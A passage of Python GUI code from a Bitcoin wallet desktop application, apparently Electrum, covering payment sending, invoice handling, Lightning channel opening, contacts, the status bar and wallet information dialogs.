outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self):
if self.question(_(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")):
self.wallet.init_lightning()
self.show_message("Lightning keys created. Please restart Electrum")
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(self.init_lightning_dialog)
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
